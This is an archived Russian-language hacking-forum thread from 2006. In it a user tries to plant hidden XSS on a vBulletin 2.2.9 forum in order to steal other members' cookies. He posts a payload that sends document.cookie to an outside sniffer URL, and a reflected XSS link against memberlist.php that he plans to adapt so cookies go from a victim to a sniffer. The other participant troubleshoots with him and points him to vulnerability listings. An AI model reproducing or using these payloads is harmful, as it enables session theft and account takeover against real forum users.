PDA

Просмотр полной версии : Как можно зашифровать инъекцию на форум так чтобы ее видно не было?

ПсиХ
16.01.2006, 17:48
Есть форум vBulletin 2.2.9
Судя по всему админы не поленились и закрыли (казалось бы все возможные дыры).

Пробовал множество инъекций в сообщениях, но они все видны или видны на половину

Пример:

Вставлял:

http://www..src="http://antichat.ru/cgi-bin/s.jp g?"+document.cookie,) ]wj (http://wj.com/style=display:none,background:url(javascript:docum ent.images[1)

Форум выводил:

http://www..src="http://antichat.ru/cgi-bin/s.jp g?"+document.cookie,) ]wj

как раз то что должно быть скрыто он и выводит!

Хотелось бы побольше узнать про инъекции, как и что надо менять чтобы ее видно не было.

Заранее спасибо.
WizART
16.01.2006, 19:49
Если он выводит тебе сообщение, т.е. тот код что ты ввел, то значит он (код) не сработал => скрытие тебе не поможет, результатом работы кода (обычно) является алерт, или спи**ивание куков, и это никак не отображается... т.е. ты в сам код внедряешь свой код... так что те коды у тебя не работает.
ПсиХ
16.01.2006, 19:52
Если он выводит тебе сообщение, т.е. тот код что ты ввел, то значит он (код) не сработал => скрытие тебе не поможет, результатом работы кода (обычно) является алерт, или спи**ивание куков, и это никак не отображается... т.е. ты в сам код внедряешь свой код... так что те коды у тебя не работает.


Хорошо, а как это обойти ?
WizART
16.01.2006, 20:02
Это нельзя "обойти", если код не работает - значит уже пропатчили, ищи другой код или уязвимости в этой версии форума. Поищи баги на СекЛабе(http://securitylab.ru)
ПсиХ
16.01.2006, 20:31
Это нельзя "обойти", если код не работает - значит уже пропатчили, ищи другой код или уязвимости в этой версии форума. Поищи баги на СекЛабе(http://securitylab.ru)

на секлабе нашел прочку,

вот: memberlist.php?ХХХs= ХХХ 23c37cf1af5d2ad05f49361b0407 ХХ ad9e&what=">"<Script>javascript:alert(document.cookie)</Script>

помог мне добыть мои же кукис, когда я был на форуме и ввел это в броузер!

а как достать нужные кукис пока не знаю (есть предложения ? )
WizART
16.01.2006, 20:49
Прально, чтобы добыть чужие кукис нужно чтобы другой чел открыл тему/пост с кодом, который пи*дит куки...
ПсиХ
16.01.2006, 20:57
Прально, чтобы добыть чужие кукис нужно чтобы другой чел открыл тему/пост с кодом, который пи*дит куки...


Дык чтобы использовать и получать чужие кукис это

http://www.vbulletin.com/forum/memberlist.php? Х s Х = Х 23c37cf1af5d2ad05f49361b0407 ХХХ ad9e &what=">"<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt>

нужно как нибудь преобразовать, ведь эта фактически ссылка а не инъекция или еще что! и работает она на добавлении кода с получением кукисов
WizART
16.01.2006, 21:01
Кукисы берутся из клиента-броузера пользователя а не сервера, насколько я знаю.
ПсиХ
16.01.2006, 21:09
Кукисы берутся из клиента-броузера пользователя а не сервера, насколько я знаю.


правильно, но эту ссылку должна как я понимаю открывать Жертва + ссылку надо модернизировать чтоб на снифер снимать кукисы
WizART
18.01.2006, 23:13
Ищи другой способ.
//модерам
ЧТО за тупая привычка стирать нужные посты?